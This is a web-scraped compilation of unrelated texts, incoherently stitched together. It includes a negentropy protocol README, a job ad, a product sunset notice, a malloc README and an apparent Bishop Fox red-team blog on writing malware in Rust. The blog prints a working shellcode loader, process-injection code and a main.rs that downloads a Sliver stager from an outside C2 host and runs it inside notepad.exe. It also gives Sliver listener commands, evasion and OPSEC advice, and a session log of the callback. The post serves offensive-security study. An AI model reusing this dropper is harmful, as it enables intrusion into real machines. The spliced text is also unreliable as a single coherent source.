Suppose two participants on a network each have a set of records that they have collected independently. Set-reconciliation efficiently determines which records one side has that the other side doesn't, and vice versa. After the records that are missing have been determined, this information can be used to transfer the missing data items. The actual transfer is external to the negentropy protocol.
This page is a technical description of the negentropy wire protocol and the various implementations. Read
our article
for a comprehensive introduction to range-based set reconciliation, and the
Negentropy Protocol V1
specification for the low-level wire protocol.
Protocol
Data Requirements
In order to use negentropy, you need to define some mappings from your data records:
record -> ID
Typically a cryptographic hash of the entire record
The ID must be 32 bytes in length
Different records should not have the same ID (satisfied by using a cryptographic hash)
Equivalent records should not have different IDs (records should be canonicalised prior to hashing, if necessary)
record -> timestamp
Although timestamp is the most obvious, any ordering criteria can be used. The protocol will be most efficient if records with similar timestamps are often downloaded/stored/generated together
Units can be anything (seconds, microseconds, etc) as long as they fit in a 64-bit unsigned integer
The largest 64-bit unsigned integer should be reserved as a special "infinity" value
Timestamps do
not
need to be unique (different records can have the same timestamp). If necessary,
0
can be used as the timestamp for every record
Negentropy does not support the concept of updating or changing a record while preserving its ID. This should instead be modelled as deleting the old record and inserting a new one.
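To make the two mappings concrete, here is a minimal illustrative sketch in Rust. It is not the API of any of the implementations listed later; the Item struct, the sha2 dependency, and the function name are assumptions chosen for the example.

use sha2::{Digest, Sha256}; // assumed hashing crate for this sketch

/// The largest u64 is reserved as the special "infinity" timestamp.
const INFINITY: u64 = u64::MAX;

/// One reconciliation item: a u64 ordering key plus a 32-byte ID.
/// Field order matters: the derived ordering sorts by timestamp first,
/// then lexically by ID.
#[derive(Clone, Copy, PartialEq, Eq, PartialOrd, Ord)]
struct Item {
    timestamp: u64,
    id: [u8; 32],
}

/// record -> (timestamp, ID): hash the canonicalised record bytes.
fn item_from_record(canonical_record: &[u8], timestamp: u64) -> Item {
    let id: [u8; 32] = Sha256::digest(canonical_record).into();
    Item { timestamp, id }
}

With the fields in this order, sorting a Vec<Item> with a plain sort() already yields the ascending (timestamp, ID) order required by the Setup section below.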
Setup
The two parties engaged in the protocol are called the client and the server. The client is sometimes also called the
initiator
, because it creates and sends the first message in the protocol.
Each party should begin by sorting their records in ascending order by timestamp. If the timestamps are equivalent, records should be sorted lexically by their IDs. This sorted array and contiguous slices of it are called
ranges
.
For the purpose of this specification, we will assume that records are always stored in arrays. However, implementations may provide more advanced storage data-structures such as trees.
Bounds
Because each side potentially has a different set of records, ranges cannot be referred to by their indices in one side's sorted array. Instead, they are specified by lower and upper
bounds
. A bound is a timestamp and a variable-length ID prefix. In order to reduce the sizes of reconciliation messages, ID prefixes are as short as possible while still being able to separate records from their predecessors in the sorted array. If two adjacent records have different timestamps, then the prefix for a bound between them is empty.
Lower bounds are
inclusive
and upper bounds are
exclusive
, as is
typical in computer science
. This means that given two adjacent ranges, the upper bound of the first is equal to the lower bound of the second. In order for a range to have full coverage over the universe of possible timestamps/IDs, the lower bound would have a 0 timestamp and an all-0s ID, and the upper bound would be the specially reserved "infinity" timestamp (max u64), for which the ID doesn't matter.
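As a hedged illustration of how a minimal bound can be computed (continuing the hypothetical Item type from the earlier sketch; this is not code from any of the reference implementations):

/// A bound: a timestamp plus a variable-length ID prefix.
struct Bound {
    timestamp: u64,
    id_prefix: Vec<u8>, // as short as possible; empty when timestamps differ
}

/// Smallest bound that separates `curr` from its predecessor `prev`.
/// Assumes prev < curr in the (timestamp, ID) ordering and prev != curr.
fn minimal_bound(prev: &Item, curr: &Item) -> Bound {
    if prev.timestamp != curr.timestamp {
        // Different timestamps: an empty ID prefix is enough.
        return Bound { timestamp: curr.timestamp, id_prefix: Vec::new() };
    }
    // Same timestamp: keep one byte past the IDs' shared prefix.
    let shared = prev
        .id
        .iter()
        .zip(curr.id.iter())
        .take_while(|(a, b)| a == b)
        .count();
    Bound {
        timestamp: curr.timestamp,
        id_prefix: curr.id[..=shared].to_vec(),
    }
}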
Alternating Messages
After both sides have set up their sorted arrays, the client creates an initial message and sends it to the server. The server will then reply with another message, and the two parties continue exchanging messages until the protocol terminates (see below). After the protocol terminates, the
client
will have determined what IDs it has (and the server needs) and which it needs (and the server has). If desired, it can then respectively upload and/or download the missing records.
Each message consists of a protocol version byte followed by an ordered sequence of ranges. Each range contains an upper bound, a mode, and a payload. The range's implied lower bound is the same as the previous range's upper bound (or 0, if it is the first range). The mode indicates what type of processing is needed for this range, and therefore how the payload should be parsed.
The modes supported are:
Skip
: No further processing is needed for this range. Payload is empty.
Fingerprint
: Payload contains a
digest
of all the IDs within this range.
IdList
: Payload contains a complete list of IDs for this range.
If a message does not end in a range with an "infinity" upper bound, an implicit range with upper bound of "infinity" and mode
Skip
is appended. This means that an empty message indicates that all ranges have been processed and the sender believes the protocol can now terminate.
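A rough sketch of the logical structure of a message follows. The actual wire encoding (varints, bound encoding, fingerprint size) is defined in the Negentropy Protocol V1 specification; the types below, including the 16-byte fingerprint, are assumptions made for illustration and reuse the Bound type sketched above.

/// What the sender wants done with a range, plus that range's payload.
enum RangePayload {
    /// No further processing needed; payload is empty.
    Skip,
    /// Digest of all the IDs within the range.
    Fingerprint([u8; 16]),
    /// Complete list of IDs within the range.
    IdList(Vec<[u8; 32]>),
}

/// A range carries only its upper bound; its lower bound is implied by
/// the previous range's upper bound (or "zero" for the first range).
struct Range {
    upper_bound: Bound,
    payload: RangePayload,
}

struct Message {
    protocol_version: u8,
    /// If the last range's upper bound isn't "infinity", an implicit
    /// trailing Skip range up to infinity is assumed.
    ranges: Vec<Range>,
}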
Algorithm
Upon receiving a message, the recipient should loop over the message's ranges in order, while concurrently constructing a new message.
Skip
ranges are answered with
Skip
ranges, and adjacent
Skip
ranges should be coalesced into a single
Skip
range.
IdList
ranges represent a complete list of IDs held by the sender. Because the receiver obviously knows the items it has, this information is enough to fully reconcile the range. Therefore, when the client receives an
IdList
range, it should reply with a
Skip
range. However, since the goal of the protocol is to ensure the
client
has this information, when a server receives an
IdList
range it should reply with its own ranges (typically
IdList
and/or Skip ranges).
Fingerprint
ranges contain a digest which can be used to determine whether or not the set of data items within the range are equal on both sides. However, if they differ, determining the actual differences requires further recursive processing.
Since
IdList
or
Skip
messages will always cause the client to terminate processing for the given ranges, these messages are considered
base cases
.
When the fingerprints on each side differ, the receiver should
split
its own range and send the results back in the next message. When splitting, the number of records within each sub-range should be considered. If small, an
IdList
range should be sent. If large, the sub-ranges should themselves be sent as
Fingerprint
s (this is the recursion).
When a range is split, the sub-ranges should completely cover the original range's lower and upper bounds.
Unlike in Meyer's designs, "empty" fingerprints are never used to indicate the absence of items within a range. Instead, an
IdList
of length 0 is sent because it is smaller.
How to split the range is implementation-defined. The simplest way is to divide the records that fall within the range into N equal-sized buckets, and emit a
Fingerprint
sub-range for each of these buckets. However, an implementation could choose different grouping criteria. For example, events with similar timestamps could be grouped into a single bucket. If the implementation believes recent events are less likely to be reconciled, it could make the most recent bucket an
IdList
instead of
Fingerprint
.
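A sketch of the simple equal-bucket split described above, reusing the hypothetical Item and RangePayload types from the earlier sketches. The bucket count, the IdList threshold, and the placeholder digest helper are all assumptions; this is illustrative, not an excerpt from a real implementation.

use sha2::{Digest, Sha256};

/// Placeholder digest over a slice of items. The real protocol uses the
/// incremental fingerprint described in the Fingerprints section, not this.
fn placeholder_digest(items: &[Item]) -> [u8; 16] {
    let mut hasher = Sha256::new();
    for item in items {
        hasher.update(item.id);
    }
    let full: [u8; 32] = hasher.finalize().into();
    full[..16].try_into().unwrap()
}

/// Split a range's records into payloads for the reply: small ranges become
/// an IdList (base case), larger ones become roughly equal Fingerprint
/// sub-ranges (the recursion). Assumes buckets >= 1.
fn split_range(items: &[Item], buckets: usize, id_list_threshold: usize) -> Vec<RangePayload> {
    if items.len() <= id_list_threshold {
        return vec![RangePayload::IdList(items.iter().map(|i| i.id).collect())];
    }
    let per_bucket = items.len().div_ceil(buckets);
    items
        .chunks(per_bucket)
        .map(|bucket| RangePayload::Fingerprint(placeholder_digest(bucket)))
        .collect()
}

A real implementation would also attach each sub-range's upper bound (via something like the minimal_bound sketch earlier) when assembling the reply message.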
Note that if alternate grouping strategies are used, an implementation should never reply to a range with a single
Fingerprint
range, otherwise the protocol may never terminate (if the other side does the same).
The initial message should cover the full universe, and therefore must have at least one range. The last range's upper bound should have the infinity timestamp (and the
id
doesn't matter, so should be empty also). How many ranges are used in the initial message depends on the implementation. The most obvious implementation is to use the same logic as described above, either using the base case or splitting, depending on set size. However, an implementation may choose to use fewer or more buckets in its initial message, and/or may use different grouping strategies.
Once the client has looped over all ranges in a server's message and its constructed response message is a full-universe
Skip
range (i.e., the empty string
""
), then it needs no more information from the server and therefore it should terminate the protocol.
Fingerprints
Fingerprints are short digests (hashes) of the IDs contained within a range. A cryptographic hash function could simply be applied over the concatenation of all the IDs, however this would mean that generating fingerprints of sub-ranges would require re-hashing a potentially large number of IDs. Furthermore, adding a new record would invalidate a cached fingerprint, and require re-hashing the full list of IDs.
To improve efficiency, negentropy fingerprints are specified as an incremental hash. There are
several considerations
to take into account, but we believe the
algorithm used by negentropy
represents a reasonable compromise between security and efficiency.
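To illustrate the general idea of an incremental fingerprint, here is a simplified conceptual sketch. It is emphatically not the algorithm negentropy specifies (consult the linked specification and article for that); it only shows why an additive accumulator lets you add an ID without re-hashing the whole range.

use sha2::{Digest, Sha256};

/// Conceptual sketch only -- NOT the negentropy fingerprint algorithm.
/// IDs are summed as 256-bit little-endian integers (mod 2^256), so adding
/// one more ID updates the accumulator in place.
struct IncrementalFingerprint {
    acc: [u8; 32],
    count: u64,
}

impl IncrementalFingerprint {
    fn new() -> Self {
        Self { acc: [0u8; 32], count: 0 }
    }

    /// Add one 32-byte ID into the accumulator (carry-propagating add).
    fn add(&mut self, id: &[u8; 32]) {
        let mut carry = 0u16;
        for i in 0..32 {
            let sum = self.acc[i] as u16 + id[i] as u16 + carry;
            self.acc[i] = sum as u8;
            carry = sum >> 8; // overflow past the top byte wraps (mod 2^256)
        }
        self.count += 1;
    }

    /// Derive a short digest from the accumulator state.
    fn digest(&self) -> [u8; 16] {
        let mut hasher = Sha256::new();
        hasher.update(self.acc);
        hasher.update(self.count.to_le_bytes());
        let full: [u8; 32] = hasher.finalize().into();
        full[..16].try_into().unwrap()
    }
}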
Frame Size Limits
If there are too many differences and/or they are too evenly distributed throughout the range, then message sizes may become unmanageably large. This might be undesirable if the network transport has message size limitations, meaning you would have to implement some kind of fragmentation system. Furthermore, large batch sizes inhibit work pipelining, where the synchronised records can be processed in parallel with additional reconciliation.
Because of this, negentropy implementations may support a
frame size limit
parameter. If configured, all messages created by this instance will be of length equal to or smaller than this number of bytes. After processing each message, any discovered differences will be included in the
have
/
need
arrays on the client.
To implement this, instead of sending all the ranges it has found that need syncing, the instance will send a smaller number of them to stay under the size limit. Any following ranges that were sent are replied to with a single coalesced
Fingerprint
range so that they will be processed in subsequent message rounds. Frame size limits can increase the number of messaging round-trips and bandwidth consumed.
In some circumstances, already reconciled ranges can be coalesced into the final
Fingerprint
range. This means that these ranges will get re-processed in subsequent reconciliation rounds. As a result, if either of the two sync parties use frame size limits, then discovered differences may be added to the
have
/
need
multiple times. Applications that cannot handle duplicates should track the reported items to avoid processing items multiple times.
Implementations
This section lists all the currently-known negentropy implementations. If you know of a new one, please let us know by
opening an issue
.
fiatjaf added support to
fq
to inspect and debug negentropy messages (see
example usage
).
Testing
There is a conformance test-suite available in the
testing
directory.
In order to test a new language you should create a "harness", which is a basic stdio line-based adapter for your implementation. See the
test/cpp/harness.cpp
and
test/js/harness.js
files for examples. Next, edit the file
test/Utils.pm
and configure how your harness should be invoked.
Harnesses may require some setup before they are usable. For example, to use the C++ harness you must first run:
git submodule update --init
cd test/cpp/
make
In order to run the test-suite, you'll need the perl module
Session::Token
(
libsession-token-perl
Debian/Ubuntu package).
Once set up, you should be able to run something like
perl test.pl cpp,js
from the
test/
directory. This will perform the following:
For each combination of languages, run the following fuzz tests:
Client has all records
Server has all records
Both have all records
Client is missing some and server is missing some
The test is repeated using each language as both the client and the server.
Afterwards, a different fuzz test is run for each language in isolation, and the exact protocol output is stored for each language. These are compared to ensure they are byte-wise identical.
Finally, a protocol upgrade test is run for each language to ensure that when run as a server it correctly indicates to the client when it cannot handle a specific protocol version.
For the Rust implementation, check out its repo in the same directory as the
negentropy
repo, build the
harness
commands for both C++ and Rust, and then, from inside the
negentropy/test/
directory, run
perl test.pl cpp,rust
For the golang implementation, check out the repo in the same directory as the
negentropy
repo, then, from inside the
negentropy/test/
directory, run
perl test.pl cpp,go
For the kotlin implementation, check out the repo in the same directory as the
negentropy
repo, then, from inside the
negentropy/test/
directory, run
perl test.pl cpp,kotlin
Author
(C) 2023-2024 Doug Hoyte and contributors
Protocol specification, reference implementations, and tests are MIT licensed.
Liva AI (YC S25) is focused on collecting high-quality and proprietary voice and video data. We're actively hiring for a community growth intern. You’ll help us foster a community at Liva AI, with an emphasis on building large online communities.
Job responsibilities:
Grow and manage an online community such as a Discord server or subreddit
Manage hundreds to thousands of people online
Communicate regularly with Liva AI team
You must:
Have grown and managed larger Discord servers, Reddit communities, or other large online communities
Have lightning-fast response times
Have a consistently flexible schedule
No need to send resume, just send me the server/subreddit/community you made with a brief description.
About
Liva AI
Liva's mission is to make AI look and sound truly human. The AI voices and faces today feel off, and lack the capability to reflect diverse people across different ethnicities, races, accents, and career professions. We’re fixing that by building the world’s richest library of human voice and video data, fueling the next generation of realistic AI.
Here’s what you need to know:
Existing users will be fully refunded today for their remaining usage.
We will provide free autocomplete inference for existing customers for the foreseeable future.
We’re sunsetting Supermaven after our acquisition
one year ago
.
After bringing features of Supermaven to Cursor Tab, we now recommend that existing VS Code users migrate to Cursor. Our
new and improved
autocomplete model has significant improvements.
While deciding the future of Supermaven, we heard feedback from our existing Neovim and JetBrains customers about their love for Supermaven. We will continue to provide autocomplete inference free for these existing customers.
We will no longer support agent conversations, a newer and infrequently used addition to the product. We recommend using your frontier model of choice inside Cursor for agentic coding.
Existing customers will receive prorated refunds today for remaining time on their subscription.
A custom implementation of malloc, calloc, realloc, and free in C.
Overview
This project implements a memory allocator from scratch using
sbrk
for small allocations and
mmap
for large allocations. It includes optimizations like block splitting to reduce fragmentation and coalescing to merge adjacent free blocks. Please note that this allocator is
not thread-safe
. Concurrent calls to malloc/free/realloc will cause undefined behavior. I've also written a blog post (~20 minute read) explaining, step by step, the process behind writing this memory allocator. If that's of interest, you can read it
here!
Building
Prerequisites
GCC compiler
Make
POSIX-compliant system (Linux, macOS) because we're using
sbrk()
and
mmap()
<- won't work on Windows
Quick Start
make # build everything
make tests # run tests
make bench # run benchmark
I credit
Dan Luu
for his fantastic malloc() tutorial, which I greatly enjoyed reading and which served as a helpful reference for this project. If you would like to take a look at his tutorial (which I highly recommend), you can find it
here
.
I'd also like to thank Joshua Zhou and Abdul Fatir for reading over and giving me great feedback on the accompanying blog post for this project.
A desktop app for isolated, parallel agentic development
mux has a custom agent loop but much of the core UX is inspired by Claude Code. You'll find familiar features like Plan/Exec mode, vim inputs,
/compact
and new ones
like
opportunistic compaction
and
mode prompts
.
mux is in a Preview state. You will encounter bugs and performance issues.
It's still possible to be highly productive. We are using it almost exclusively for our own development.
See
AGENTS.md
for development setup and guidelines.
License
Copyright (C) 2025 Coder Technologies, Inc.
This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General Public License as published by the Free Software Foundation, version 3 of the License.
TL;DR: This blog explores the advantages of using Rust over C for malware development, highlighting Rust's evasive characteristics and challenges for reverse engineering.
Through a hands-on example of a simple shellcode dropper, it demonstrates how Rust can better simulate modern adversarial tactics.
Introduction
One of my New Year’s resolutions for 2025 was to deepen my understanding of malware development, complementing my experience in gaining initial footholds through
web application and API penetration testing
. I was strongly motivated to enhance my own abilities, so I could better simulate real adversarial tactics. For malware development, I chose Rust as the primary programming language for its inherent anti-analysis features – allowing for the development of more evasive tooling. In this blog post, we'll compare developing malware in Rust with developing it in C, and build a simple malware dropper for demonstration.
Update
Now Featuring Podcast Interview
In addition to this in-depth exploration of Rust for malware development, Bishop Fox Security Consultant Nick Cerne recently discussed his research on the CyberWire’s Research Saturday podcast. The episode delves into the nuances of using Rust to create evasive malware tooling and the challenges it presents for reverse engineering. You can listen to the full conversation here:
Crafting malware with modern metals – Research Saturday Ep. 373
.
Rust VS. C Languages – A Comparative Analysis
At this point, you might be wondering—why Rust? What advantages does using Rust for malware development have over traditional languages like C or C++?
Reverse engineering or analyzing binaries compiled in Rust is more difficult than analyzing their C/C++ counterparts.
Malware developed in an unconventional language is much more likely to bypass signature-based detection mechanisms.
In 2023, the Rochester Institute of Technology published a
thesis
which aimed to prove or disprove these hypotheses by performing a comparative analysis of malware developed in Rust and C/C++. The results of the study are summarized by the following facts:
The size of Rust binaries is significantly larger than their C/C++ counterparts, which could increase reverse engineering efforts and complexity.
Automated malware analysis tools produced more false positives and false negatives when analyzing malware compiled in the Rust programming language.
Status quo reverse engineering tools like Ghidra and IDA Free do not do a great job of disassembling Rust binaries as opposed to C/C++.
To explore these results, we can analyze and compare functionally identical shellcode loader samples. Specifically, a sample developed in Rust and the other in C. At a high level, our malware samples will perform the following:
Read, from a file, raw shellcode bytes that launch
calc.exe.
Write and execute the shellcode in memory of the local process using Windows APIs.
For example, the Rust code snippet can be referenced below:
use std::fs::File;
use std::ptr;
use std::io::{self, Read};
use windows::Win32::{
System::{
Threading::{CreateThread, WaitForSingleObject, THREAD_CREATION_FLAGS, INFINITE},
Memory::{VirtualAlloc, VirtualProtect, MEM_COMMIT, MEM_RESERVE, PAGE_READWRITE, PAGE_EXECUTE_READWRITE, PAGE_PROTECTION_FLAGS},
},
Foundation::CloseHandle
};
fn main() {
/* Reading our shellcode into payload_vec */
let mut shellcode_bytes = File::open("shellcode/calc.bin").unwrap();
let mut payload_vec = Vec::new();
shellcode_bytes.read_to_end(&mut payload_vec);
unsafe {
/* Allocating memory in the local process */
let l_address = VirtualAlloc(Some(ptr::null_mut()), payload_vec.len(), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
/* Copying shellcode to allocated memory */
ptr::copy(payload_vec.as_ptr(), l_address as *mut u8, payload_vec.len());
/* Modifying memory protections */
VirtualProtect(l_address, payload_vec.len(), PAGE_EXECUTE_READWRITE, &mut PAGE_PROTECTION_FLAGS(0));
/* Creating local thread and running shellcode */
let h_thread = CreateThread(Some(ptr::null()), 0, Some(std::mem::transmute(l_address)), Some(ptr::null()), THREAD_CREATION_FLAGS(0), Some(ptr::null_mut())).unwrap();
WaitForSingleObject(h_thread, INFINITE);
CloseHandle(h_thread);
};
println!("[!] Success! Executed shellcode.");
}
The code first reads the shellcode from
shellcode/calc.bin
and stores the result in a buffer. Subsequently, the code allocates a block of memory in the local process based on the size of the buffer. The shellcode is then copied to the allocated memory. Finally, the memory region's protections are modified, and the shellcode is executed in a new thread. For the sake of brevity, the C equivalent to the above can be referenced on our
Github
.
After compiling both programs, we can immediately see that the Rust program was significantly larger:
PS > dir
...omitted for brevity...
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/18/2025 5:19 PM 73374 c_malware.exe
-a---- 2/18/2025 4:10 PM 155136 rust_malware.exe
The compiled C program had a file size of 71.7 kilobytes (KB) whereas the release build of the Rust program was nearly double the size at 151.5 KB. When using default compiler optimization settings, Rust will statically link dependencies at compile-time. This means that all of the libraries required by the program are compiled directly into the executable, including a large portion of the Rust standard and runtime libraries. In contrast, C typically makes use of dynamic linking, which leverages external libraries installed on the system. While the larger file sizes could be considered a drawback, they could also increase the level of effort and complexity in reverse engineering Rust malware.
We can also determine if Rust malware is more difficult to reverse engineer by looking at the decompiled Ghidra output for both programs. For the sake of brevity, we'll use the Ghidra output and not include IDA Free in our analysis. Now let's look at the decompiled main function of the Rust malware, comparing it to the code above.
The above decompiled output is difficult to read and comprehend. This inability of Ghidra to properly decompile the Rust program is likely due to the following:
Ghidra attempted to decompile the Rust program to pseudo-C; differences in memory management and optimization between the languages resulted in pseudo code that is difficult to understand.
rustc
performs a number of optimizations during compilation, leading to fewer clear function boundaries and highly optimized assembly (ASM) that is difficult to interpret.
The second point can be observed by comparing the ASM of the following Rust program at different compiler optimization levels:
fn add(a: i32, b: i32) -> i32 {
a + b
}
fn main() {
let x = add(3, 4);
println!("{}", x);
}
Our program simply defines a function add and calls it in our main function with two arguments. Next, we can compile the program to unoptimized and optimized ASM using the following
rustc
commands:
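(Assuming the source file is named main.rs; these are standard rustc options, chosen so the output names match the vim invocation below.)
rustc --emit asm -C opt-level=0 main.rs -o unoptimized.s
rustc --emit asm -C opt-level=3 main.rs -o optimized.s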
We can compare the optimized and unoptimized ASM using
vim -d unoptimized.s optimized.s:
Figure 1: Optimized and Unoptimized ASM Comparison
As shown in the optimized ASM on the left, the symbol definition for the add function is missing, indicating that the function could have been in-lined by
rustc
optimizations at compile-time.
It is also worth noting that, like C++, Rust performs
symbol name mangling
, with semantics specific to Rust. However, Ghidra introduced Rust symbol name de-mangling with release 11.0. Prior to version 11.0, Ghidra did not natively support Rust name de-mangling, which made reverse engineering even more difficult. Significant strides have been made since then, and attempts to de-mangle symbols can be seen in the decompiled output with strings such as
std::fs::impl$8::read_to_end();
which corresponds to
shellcode_bytes.read_to_end(&mut payload_vec);
in our original code.
In contrast, the decompiled C program was much more trivial to review:
The decompiled output of the C program mirrored the source much more closely than its Rust counterparts. Additionally, in Ghidra, key functions and variables were significantly easier to identify in the symbol tree of the C program.
One important operational security (OPSEC) consideration is that Rust will include absolute file paths in compiled binaries, primarily for debugging purposes. Therefore, if OPSEC is important to you, compiling in an environment that doesn't expose identifying characteristics is a good idea.
$ strings ./rust_malware.exe | grep Nick
C:\Users\Nick\.rustup\toolchains\stable-x86_64-pc-windows-msvc\lib/rustlib/src/rust\library\alloc\src\raw_vec.rs
C:\Users\Nick\.rustup\toolchains\stable-x86_64-pc-windows-msvc\lib/rustlib/src/rust\library\alloc\src\string.rs
In conclusion, Rust could make a great alternative to C/C++ when developing malware. While the 11.0 release of Ghidra marked a significant step towards decompiling and analyzing Rust binaries, reviewing the decompiled output of Rust programs remains difficult due to function inlining and other optimizations made by
rustc
during compile-time. Additionally, the larger resulting binaries could make analyzing Rust malware more time-consuming than analyzing their C counterparts. It will be interesting to see what improvements the Ghidra team or the open-source community will make in the future to make static analysis of Rust malware easier.
Developing a Rust Malware Dropper
Now with some affirmation that Rust is a solid choice for malware development, let’s build a dropper to demonstrate. A dropper is a form of malware that is designed to install additional malware onto a computer. For our purposes, we will develop a dropper that performs the following:
Enumerates processes on the target for injecting our payload
Executes the payload using a file-mapping injection technique
Stages
sliver
over
HTTPS
Please note that the following malware is not comprehensive, and several improvements could be made from an OPSEC and evasion perspective. The following code snippets are simply to illustrate how Rust can be used for malware development.
First, we will initialize our Rust project and create our first module
enumerate_processes.rs:
use windows::{
Win32::System::ProcessStatus::EnumProcesses,
Win32::Foundation::{CloseHandle, HMODULE},
Win32::System::Threading::{OpenProcess, PROCESS_QUERY_INFORMATION, PROCESS_VM_READ},
Win32::System::ProcessStatus::{GetModuleBaseNameW}
};
pub fn get_process_pids() -> Vec<u32> {
/* Starting with a reasonable buffer size to store our PIDs */
let mut pids = vec![0u32; 1024];
let mut cb = 0u32;
unsafe {
/* Loop to dynamically resize the buffer if it is too small */
loop {
if EnumProcesses(pids.as_mut_ptr(), pids.len() as u32, &mut cb).is_err() {
/* Fail silently */
return vec![];
};
/* Identify number of pids through bytes written */
let num_pids = (cb as usize) / size_of::<u32>();
/* If buffer is larger than number of pids */
if num_pids < pids.len() {
pids.truncate(num_pids);
return pids;
}
pids.resize(pids.len() * 2, 0);
}
}
}
pub fn get_process_name(pid: u32) -> String {
/* Stores the process name into a temporary buffer */
let mut name_buffer: [u16; 260] = [0; 260];
unsafe {
let hresult = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, false, pid);
if hresult.is_err() {
return String::from("");
};
let handle = hresult.unwrap();
let module_name_len = GetModuleBaseNameW(handle, Some(HMODULE::default()), &mut name_buffer);
CloseHandle(handle);
if module_name_len == 0 {
return String::from("");
}
/* Returns a string decoded from the temporary buffer */
return String::from_utf16_lossy(&name_buffer[..module_name_len as usize]);
}
}
The above code leverages several Windows APIs to enumerate remote processes on the target system. Specifically, the following APIs were used:
EnumProcesses
- Retrieves the process identifiers (PID) for each process in the system and stores the results in an array.
OpenProcess
- Opens a handle to an existing local process object using a specified PID.
GetModuleBaseNameW
- Retrieves the process name using the open handle to the process.
We can quickly create a unit test in the same file to validate that the above code is working as expected.
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_enumerate_processes() {
let pids = get_process_pids();
let has_svchost = pids.iter().any(|&pid| {
get_process_name(pid) == "svchost.exe"
});
assert!(has_svchost, "No svchost.exe process found");
}
}
After running
cargo test
, we get the following output which indicates the code successfully identified the
svchost.exe
process.
PS > cargo test
...omitted for brevity...
running 1 test
test enumerate_processes::tests::test_enumerate_processes ... ok
test result: ok. 1 passed; 0 failed; 0 ignored; 0 measured; 0 filtered out; finished in 0.00s
Now that we've created a means to enumerate the remote processes on the system, we should write the code responsible for injecting our payload into a specified process. Before injecting shellcode into a process, a private memory block corresponding to the length of the payload must first be allocated in the target process. To achieve this, attackers commonly make use of the
VirtualAlloc
and
VirtualAllocEx
Windows APIs, which allocate memory directly in the specified process. Therefore, the process of allocating private memory using this method is highly monitored by security solutions. Alternatively, we can use a technique called Remote Mapping Injection which is capable of allocating memory using lesser-known Windows APIs:
CreateFileMapping
- Creates a file mapping object which will contain the length of our payload.
MapViewOfFile
- Maps a view of the file mapping object into the local address space.
MapViewOfFileNuma2
- Maps a view of the file mapping object into a remote process's address space, which includes our payload.
It's important to note that before calling
MapViewOfFileNuma2
, the payload must first be copied into the local address space created when calling
MapViewOfFile
. Once the payload is copied to the remote process, we'll utilize the
CreateRemoteThread
API to execute it.
CreateRemoteThread
is another highly monitored Windows API, but we'll use it for the sake of brevity and to avoid adding further complexity to our example.
For testing purposes, we'll simply attempt to inject
calc.exe
shellcode into the memory of the
notepad.exe
process.
After running our unit test, we can see that
calc.exe
was successfully injected and executed in memory of
notepad.exe.
Figure 2: Calc.exe Successfully Injected and Executed in Memory of notepad.exe
Additionally, we can view our payload in the memory regions of
notepad.exe
immediately after the payload is copied to the remote process using
x64dbg.exe
:
Figure 3: Payload in Memory Regions of Notepad.exe
As demonstrated, our payload was successfully copied to the
0x20efa400000
memory address of
notepad.exe
and our payload was executed.
Now we should first set up our
sliver
C2 environment (
get sliver here
). For simplicity, we'll just be interacting directly with our C2 server since we don't need to worry about hiding it in our testing environment. We can set up an HTTPS stage listener using the following commands:
sliver > profiles new --http sliver.nrcerne.com --format shellcode sliver-https
[*] Saved new implant profile sliver-https
sliver > stage-listener --url https://sliver.nrcerne.com:8886 --profile sliver-https --prepend-size
[*] No builds found for profile sliver-https, generating a new one
[*] Sliver name for profile sliver-https: PROFITABLE_ALUMINIUM
[*] Job 1 (https) started
Next, we should set up an HTTPS listener:
sliver > https
[*] Successfully started job #10
Finally, we need to generate our stager and serve it from our C2 infrastructure.
generate stager --protocol https --lhost sliver.nrcerne.com --lport 8886 -f raw
--save /tmp
[*] Sliver implant stager saved to: /tmp/DULL_EQUIPMENT
Now we can modify
main.rs
to download and execute our sliver stager in the context of
notepad.exe
. Note that a simple HTTPS client was developed using the
reqwest
library to retrieve our shellcode.
mod enumerate_processes;
mod remote_mapping_injection;
mod http_client;
fn main() {
let url = String::from("https://sliver.nrcerne.com:8444/DULL_EQUIPMENT");
let shellcode = http_client::get_payload_bytes(url).unwrap();
let pids = enumerate_processes::get_process_pids();
let mut p_name: String;
for p in pids {
p_name = enumerate_processes::get_process_name(p);
if p_name == "notepad.exe" {
remote_mapping_injection::inject(p, &shellcode);
}
}
}
After running the executable, we observe the following connect back to our sliver server indicating that our stager was successfully executed in memory of
notepad.exe
.
[*] Session 7f947e00 PROFITABLE_ALUMINIUM - 3.81.150.232:49807 (EC2AMAZ-999SMRM) - windows/amd64 - Tue, 25 Feb 2025 00:44:18 UTC
sliver > sessions
ID Transport Remote Address Hostname Username Operating System Health
========== =========== ===================== ================= =============== ================== =========
7f947e00 http(s) 3.81.150.232:49807 EC2AMAZ-999SMRM Administrator windows/amd64 [ALIVE]
sliver > use 7f947e00
[*] Active session PROFITABLE_ALUMINIUM (7f947e00-3b9a-4ef0-ad83-06a31a44c9f9)
sliver (PROFITABLE_ALUMINIUM) > whoami
Logon ID: EC2AMAZ-999SMRM\Administrator
As demonstrated, Rust could make a great alternative to C/C++ for malware development and can easily be used to stage
sliver
or perform other malicious actions. As mentioned above, several improvements could be made to the example from an OPSEC and evasion standpoint, but a simple dropper was sufficient for our demonstration.
As you are probably already aware, malware development is a constantly evolving game of cat and mouse, requiring constant refinement and development of new techniques to remain effective as security solutions evolve in tandem. Although the process has been challenging so far in 2025, it has also been very rewarding, providing me with valuable insights into Windows internals and modern evasion techniques. Additionally, learning a cool new systems-level language was a great byproduct that I can carry into other low-level projects!
Iowa City Made Its Buses Free. Traffic Cleared, and So Did the Air
I used to call myself a Rust hater, but really I was doing it just to compensate for the perceived fanboyism (e.g., Rust topping Stack Overflow surveys as the most-loved language). There are many reasons to hate C++, and I hate C++ too. Lots of people were waiting for a better programming language, but got Rust instead.
There are several core problems with Rust:
Its compilation is slow. I mean SLOW. Slower than C++.
I know that over the years Rust has become several times faster to compile, but objectively we need it to be two orders of magnitude faster, not just a few times faster.
It’s complex. Just as complex as C++. But C++ has legacy as an excuse, and Rust does not. The complexity of forcing your way through the jungle of
Arc<Mutex<Box<T>>>
at every single step directly impacts the quality of the logic being implemented, i.e. you can’t see the forest for the trees. Once again, C++ has the same problem, so what’s the point of the language switch in the end?
